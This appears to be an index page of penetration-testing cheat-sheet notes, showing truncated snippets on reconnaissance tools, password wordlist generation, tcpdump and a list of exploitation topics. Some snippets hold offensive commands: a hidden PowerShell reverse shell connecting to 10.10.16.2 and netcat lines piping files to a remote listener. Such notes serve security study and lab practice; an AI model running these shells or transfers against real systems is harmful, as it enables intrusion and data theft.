NBTSCAN nbtscan -r 10.11.1.0/24

Social-Searcher Useful resource to gather info from several social networks: Social-Searcher Twofi Scans a user’s Twitter feed and generates a personalized wordlist used for password attacks again...

To get started, let’s simply run recon-ng: kali@kali:~$ recon-ng [*] Version check disabled. /\ / \\ /\ Spon...

Security Headers Analyze HTTP response headers and provide basic analysis of the target site’s security posture Security Headers SSL Server Test Analyzes a server’s SSL/TLS configuration and compa...

Reverse Shell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.2", 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($...

Read a pcap -r read a file sudo tcpdump -r password_cracking_filtered.pcap Capture traffic -i choose interface sudo tcpdump -i tun0 icmp Filter by src/dst host tcpdump -n <src/dst> host 1...

Transfer File Output the exit of the file towards the netcat listener on the victim machine: type .\out.txt | .\nc.exe -nv 10.10.16.2 443 Then redirect the traffic towards the destination file: nc...

Transfer File Output the exit of the file towards the netcat listener on the victim machine: nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe Then redirect the traffic to...

mkdir mkdir -p {content,exploits,nmap} Reload zsh Useful command to reload zsh when it is modified (alias, keys, etc.): source ~/.zshrc Pyenv pyenv install <version> pyenv versions pyenv gl...

Content Git Source retrieve with GitHacker AWS Enumeration Lambda Function Enumeration Authentication Bypass Abusing JWT Server Side Template Injection (SSTI) Tar Symlink Exploitati...